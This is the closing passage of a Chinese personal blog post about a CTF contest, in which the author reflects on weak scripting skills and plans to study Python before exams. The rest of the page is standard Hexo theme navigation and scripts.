<p>打完这次比赛发现自己好多题还是没有思路，还有写脚本的能力太弱了，正则也有很多细节没学好，接下来准备从核心编程和python黑帽子入手深入学一下python。</p>
<p>通过ctf发现自己很多常见漏洞之前都是一知半解的没有很深入的理解利用，接下来要静下心来多看看书。</p>
<p>要考四级了，也要期末了</p>
<p>希望自己能沉稳一点，每天都能比昨天的自己进步一点点</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"><i class="fa fa-tag"></i> ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/21/一道MISC带你走入双图隐写/" rel="next" title="一道MISC带你走入双图隐写">
                <i class="fa fa-chevron-left"></i> 一道MISC带你走入双图隐写
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/12/03/BCTF2018-web-1/" rel="prev" title="BCTF2018-web(1)">
                BCTF2018-web(1) <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
  <div id="gitalk-container">
  </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/head.jpg" alt="像风">
            
              <p class="site-author-name" itemprop="name">像风</p>
              <p class="site-description motion-element" itemprop="description">红墙白雪，要你喜欢</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://yogai.top/" title="Mr.Yoga's Blog" target="_blank">Mr.Yoga's Blog</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Web"><span class="nav-number">2.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#签到题"><span class="nav-number">2.1.</span> <span class="nav-text">签到题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#滴！晨跑打卡"><span class="nav-number">2.2.</span> <span class="nav-text">滴！晨跑打卡</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Go-Lakers"><span class="nav-number">2.3.</span> <span class="nav-text">Go Lakers</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#全球最大交友网站"><span class="nav-number">2.4.</span> <span class="nav-text">全球最大交友网站</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小绿草之最强大脑"><span class="nav-number">2.5.</span> <span class="nav-text">小绿草之最强大脑</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基本操作"><span class="nav-number">2.6.</span> <span class="nav-text">基本操作</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Misc"><span class="nav-number">3.</span> <span class="nav-text">Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#CalcNow"><span class="nav-number">3.1.</span> <span class="nav-text">CalcNow</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#后记"><span class="nav-number">4.</span> <span class="nav-text">后记</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">像风</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>





<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
<span class="post-meta-divider">|</span>
<span id="busuanzi_container_site_uv">总访客<span id="busuanzi_value_site_uv"></span>人</span>
<span class="post-meta-divider">|</span>

        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
  <script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>
   <script type="text/javascript">
        var gitalk = new Gitalk({
          clientID: 'd259937a31344a1a46ae',
          clientSecret: '3826457715dc3953fd3b9dbbf2b14fe5f439cb8f',
          repo: 'xiangfengwGitalk.github.io',
          owner: 'xiangfengw',
          admin: ['xiangfengw'],
          id: md5(window.location.pathname),
          distractionFreeMode: 'true'
        })
        gitalk.render('gitalk-container')
       </script>

  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("z9ObT78TADO2kJRWtcx7KcJ9-gzGzoHsz", "qnQPw2nX4dh8VKCgNAv7LsYv");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
